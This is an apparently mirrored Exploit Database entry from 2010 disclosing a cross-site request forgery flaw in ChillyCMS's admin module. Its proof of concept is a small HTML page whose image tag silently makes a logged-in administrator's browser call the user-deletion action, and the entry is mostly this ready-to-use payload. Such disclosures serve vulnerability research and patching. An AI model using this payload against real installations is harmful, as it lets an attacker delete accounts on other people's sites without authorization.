ChillyCMS – Cross-Site Request Forgery

• Exploit Database
• 51 阅读

• 作者： pratul agrawal
  日期： 2010-03-17
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11781/

• =======================================================================
   
  chilly_CMS CSRF Vulnerability
   
  =======================================================================
   
  
   
   
   
  # Vulnerability found in- Admin module
   
  # email Pratulag@yahoo.com
   
  # company aksitservices
   
  # Credit by Pratul Agrawal
   
  # Softwarechilly_CMS
  
  # Category	CMS / Portals
  
  # Plateform php
  
  # Greetz to Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun (My Web Team)
  
   
   
  #Proof of concept #
   
   
   Script to Delete the Admin user through Cross Site request forgery
   
   .................................................................................................................
   
  <html>
   
  <body>
   
  <img src=http://server/chillycms/admin/usersgroups.site.php?action=deleteuser&id=[user ID] />
   
  </body>
   
  </html>
   
   ...................................................................................................................
   
   
   
  After execution refresh the page and u can see that a added content is deleted automatically.
  
  
  #If you have any questions, comments, or concerns, feel free to contact me.